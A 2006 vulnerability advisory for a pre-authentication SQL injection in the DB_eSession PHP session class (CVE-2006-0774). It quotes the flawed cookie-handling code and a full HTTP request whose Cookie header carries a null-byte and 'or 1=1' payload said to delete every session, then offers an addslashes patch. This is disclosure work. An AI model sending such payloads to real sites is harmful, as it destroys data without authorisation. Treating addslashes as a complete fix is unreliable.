DB_eSession SQL Injection
Vendor: Lawrence Osiris
Product: DB_eSession
Version: <= 1.0.2
Website: http://www.phpclasses.org/browse/package/1624.html
BID: 16598
CVE: CVE-2006-0774
OSVDB: 23104
SECUNIA: 18805
Description:
DB_eSession is a feature-packed PHP class that stores the session data in a MySQL database rather than files. It is powerful, designed with security in mind, and is easy to utilize. The DB_eSession library is used in a number of popular web applications, and private projects alike. DB_eSession is vulnerable to SQL Injection attacks due to unsafe use of cookie data in an SQL query, and can allow an attacker to craft malicious SQL Queries and have them then successfully executed.


SQL Injection:
There is an SQL injection vulnerability in DB_eSession that allow for an attacker to perform pre authentication SQL Injection attacks against the vulnerable web application.
/**
* Try and save the current session ID if one is defined already.
*/
if (isSet($_COOKIE[$this->_sess_name]))
   $_sess_id_set = $_COOKIE[$this->_sess_name];
else
if (isSet($GLOBALS[$this->_sess_name]))
   $_sess_id_set = $GLOBALS[$this->_sess_name];
else
   $_sess_id_set = NULL;

The above code is from DB_eSession class @ lines 1080 - 1090 The variable $this->_sess_name is in most cases PHPSESSID, or set to a developer specified value. You should be able to tell from having a look at your cookies.

GET /example/index.php HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: example=143263645564654563456345634563435%00' or 1=1/*

The above request would successfully delete all of the sessions in the database. The reason for the null byte is to get past having the application die @ line 1134. Depending on what the version of MySQL in use is, other attacks may be possible. The root of this problem is that unsafe data is taken from a cookie value and then passed to the deleteSession() function where it is then used in an SQL query.


Solution:
The vendor was unresponsive to my contact attempts, but a fix is not too difficult @ line 1092 add the following code below the code shown @1080-1090

$_sess_id_set = ( empty($_sess_id_set) ) ? NULL: addslashes($_sess_id_set);

This should effectively stop any SQL Injection attacks against the vulnerable DB_eSession class.


Credits:
James Bercegay of the GulfTech Security Research Team